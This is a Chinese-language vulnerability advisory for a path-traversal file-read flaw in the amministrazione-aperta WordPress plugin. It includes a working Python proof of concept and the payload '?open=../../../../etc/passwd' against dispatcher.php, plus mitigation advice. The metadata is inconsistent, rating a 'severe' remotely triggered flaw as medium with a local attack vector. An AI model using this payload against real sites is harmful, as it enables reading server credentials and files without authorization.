CVE-2022-50956 WordPress插件本地文件读取漏洞

漏洞信息

漏洞编号

CVE-2022-50956

漏洞类型

本地文件读取

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Plugin amministrazione-aperta

漏洞概述

WordPress插件amministrazione-aperta 3.7.3版本存在严重的本地文件读取漏洞。由于dispatcher.php文件对open参数缺乏充分的输入验证，未经身份验证的攻击者可利用此缺陷读取服务器上的任意文件。攻击者只需在URL中构造特定的文件路径，即可绕过安全限制，访问Web服务器权限范围内的敏感文件，如配置文件、数据库凭证等。该漏洞严重威胁系统数据的机密性，建议管理员立即采取措施进行修复。

技术细节

该漏洞源于WordPress插件amministrazione-aperta在处理文件包含请求时未对用户输入进行有效过滤。具体而言，dispatcher.php脚本直接获取GET参数open的值，并将其用于文件操作，而未检查是否包含非法路径字符。攻击者可以利用路径遍历技术（如使用../序列）跳出Web根目录，进而读取系统敏感文件。由于该漏洞无需身份验证即可触发，攻击门槛较低。一旦利用成功，攻击者可获取服务器上的关键信息，为进一步的渗透攻击（如数据库提权或服务器接管）提供便利。

攻击链分析

STEP 1

步骤1：信息收集

攻击者扫描目标WordPress站点，识别是否安装了amministrazione-aperta插件及其版本。

STEP 2

步骤2：发送恶意请求

攻击者构造包含路径遍历载荷（如?open=../../../../etc/passwd）的HTTP GET请求，发送至dispatcher.php接口。

STEP 3

步骤3：读取敏感文件

由于缺乏过滤，服务器端执行文件读取操作，将目标文件（如/etc/passwd）的内容返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_url):
    # Vulnerable endpoint path
    vuln_path = "/wp-content/plugins/amministrazione-aperta/dispatcher.php"
    # Payload to read /etc/passwd
    payload = "?open=../../../../etc/passwd"
    
    full_url = target_url + vuln_path + payload
    
    try:
        response = requests.get(full_url, timeout=10)
        if response.status_code == 200 and "root:" in response.text:
            print(f"[+] Vulnerability confirmed at {target_url}")
            print(f"[+] Response content:\n{response.text}")
        else:
            print("[-] Target is not vulnerable or file not found.")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    target = "http://example.com"
    check_vulnerability(target)

影响范围

amministrazione-aperta <= 3.7.3

防御指南

临时缓解措施

建议立即检查并升级amministrazione-aperta插件至修复了该漏洞的最新版本。在无法立即升级的情况下，应通过Web服务器配置（如Nginx或Apache规则）严格限制对dispatcher.php文件的直接外部访问，或利用WAF拦截包含路径遍历字符（如../）的请求参数，以缓解漏洞被利用的风险。